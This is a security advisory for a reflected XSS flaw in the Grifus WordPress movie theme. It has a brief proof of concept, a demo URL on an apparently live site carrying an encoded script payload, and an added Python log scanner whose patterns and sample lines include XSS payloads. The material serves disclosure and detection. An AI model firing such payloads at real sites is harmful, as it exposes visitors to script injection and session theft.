======
Title: Grifus WordPress Theme XSS Vulnerability
Version: 4.0.1
Homepage: https://mundothemes.com/grifus/
=======

Description
================
Grifus is a WordPress theme for movie websites.

POC:
========
1. Go to the target website.
2. Click the search box.
3. Enter this payload in the search box: " "
4. The XSS payload will be executed.

Demo:
======
http://download.lakshmipuronline.com/?s=%3Cscript%3Eprompt%28document.domain%29%3C%2Fscript%3E

Mitigations
================
Update your theme.

--
Thanks
Sajibe Kanti
Independent Web Security Researcher
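
Added example (not part of the original advisory): a log check for sites running the theme, flagging requests whose WordPress search parameter `s` decodes to markup, as in the demo URL above. It assumes common/combined-format access logs; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request line inside a common/combined-format entry: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Markup that has no place in a search term: a tag opener,
# an inline event handler, or a javascript: URI.
MARKUP_RE = re.compile(r'<\s*/?\s*[a-z!]|\bon\w+\s*=|javascript\s*:', re.IGNORECASE)


def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input (%253C) is normalised too."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_searches(log_lines):
    """Return (client_ip, decoded_term) for each search request whose term carries markup."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = urlsplit(match.group(1)).query
        # parse_qs performs the first round of decoding (including '+' to space).
        for term in parse_qs(query, keep_blank_values=True).get("s", []):
            term = decode_fully(term)
            if MARKUP_RE.search(term):
                hits.append((line.split(" ", 1)[0], term))
    return hits


# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /?s=batman+returns HTTP/1.1" 200 5120',
    '198.51.100.23 - - [01/Jan/2024:10:00:05 +0000] "GET /?s=%3Cscript%3Eprompt%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 200 5342',
    '198.51.100.23 - - [01/Jan/2024:10:00:09 +0000] "GET /?s=%253Cscript%253Eprompt%2528document.domain%2529%253C%252Fscript%253E HTTP/1.1" 200 5301',
    '203.0.113.7 - - [01/Jan/2024:10:00:12 +0000] "GET /wp-login.php HTTP/1.1" 200 2100',
]

if __name__ == "__main__":
    for ip, term in suspicious_searches(SAMPLE_LOG):
        print(ip, repr(term))
```

A hit only shows that markup was submitted; whether it was reflected unescaped depends on the theme version that served the response.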